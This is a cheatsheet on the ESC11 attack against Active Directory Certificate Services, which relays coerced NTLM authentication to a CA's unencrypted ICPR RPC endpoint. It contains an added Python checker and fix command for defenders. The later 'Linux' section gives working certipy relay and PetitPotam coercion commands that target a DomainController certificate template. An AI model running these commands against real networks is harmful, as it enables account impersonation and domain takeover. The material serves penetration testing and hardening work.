ESC11

A cheatsheet for exploiting the ESC11 vulnerability by targeting the IF_ENFORCEENCRYPTICERTREQUEST flag in ADCS to abuse NTLM relay attacks for certificate requests.


Author: BobBuilder


ESC11 abuses a CA whose MS-ICPR RPC interface does not enforce the IF_ENFORCEENCRYPTICERTREQUEST flag. When that flag is absent, certificate requests over the ICPR endpoint can be made on unencrypted RPC sessions, so an attacker who coerces SMB NTLM authentication can relay it (with ntlmrelayx.py or Certipy) to RPC/ICPR and enroll a certificate from an authorized template as the coerced account.
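Defender-side check, added here and not part of the original cheatsheet: it parses the output of `certutil -getreg CA\InterfaceFlags` (the two samples below are constructed, with a hypothetical CA name) and reports whether IF_ENFORCEENCRYPTICERTREQUEST is set, which is the setting ESC11 depends on being absent.

```python
import re

# Bit value of IF_ENFORCEENCRYPTICERTREQUEST in CA\InterfaceFlags (certadm.h).
IF_ENFORCEENCRYPTICERTREQUEST = 0x200

# Constructed sample output for a CA that does NOT enforce encrypted ICPR
# requests (hypothetical CA name EXAMPLE-CA; 0x441 = 1089).
SAMPLE_VULNERABLE = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\EXAMPLE-CA\\InterfaceFlags:

  InterfaceFlags REG_DWORD = 441 (1089)
    IF_LOCKICERTREQUEST -- 1
    IF_NOREMOTEICERTADMINBACKUP -- 40 (64)
    IF_ENABLEADMINASAUDITOR -- 400 (1024)
CertUtil: -getreg command completed successfully.
"""

# Constructed sample for the same CA after the flag was added (0x641 = 1601).
SAMPLE_HARDENED = SAMPLE_VULNERABLE.replace(
    "= 441 (1089)", "= 641 (1601)"
).replace(
    "    IF_ENABLEADMINASAUDITOR",
    "    IF_ENFORCEENCRYPTICERTREQUEST -- 200 (512)\n    IF_ENABLEADMINASAUDITOR",
)

_FLAGS_RE = re.compile(r"InterfaceFlags\s+REG_DWORD\s*=\s*([0-9A-Fa-f]+)")


def parse_interface_flags(certutil_output: str) -> int:
    """Return the InterfaceFlags DWORD; certutil prints the value in hex."""
    match = _FLAGS_RE.search(certutil_output)
    if not match:
        raise ValueError("InterfaceFlags REG_DWORD line not found in certutil output")
    return int(match.group(1), 16)


def enforces_encrypted_icpr(certutil_output: str) -> bool:
    """True when IF_ENFORCEENCRYPTICERTREQUEST is set, i.e. ESC11 is not exposed."""
    return bool(parse_interface_flags(certutil_output) & IF_ENFORCEENCRYPTICERTREQUEST)


def esc11_report(certutil_output: str) -> str:
    """One-line finding suitable for an audit log."""
    flags = parse_interface_flags(certutil_output)
    if flags & IF_ENFORCEENCRYPTICERTREQUEST:
        return f"InterfaceFlags=0x{flags:X}: encrypted ICPR enforced (ESC11 not exposed)"
    return f"InterfaceFlags=0x{flags:X}: IF_ENFORCEENCRYPTICERTREQUEST missing (ESC11 exposed)"


if __name__ == "__main__":
    print(esc11_report(SAMPLE_VULNERABLE))
    print(esc11_report(SAMPLE_HARDENED))
```

On a real CA, pipe the live `certutil -getreg CA\InterfaceFlags` output into `esc11_report`; the fix is `certutil -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST` followed by a CertSvc restart.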

Linux

Set up the relay

bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController

Coerce authentication with PetitPotam

bob$ python3 PetitPotam.py -u <user> -p <pass> -d <domain> <target_ip_address> <listener_address>

Certipy receiving authentication from the AD DC

bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController

Now we follow the steps from ESC8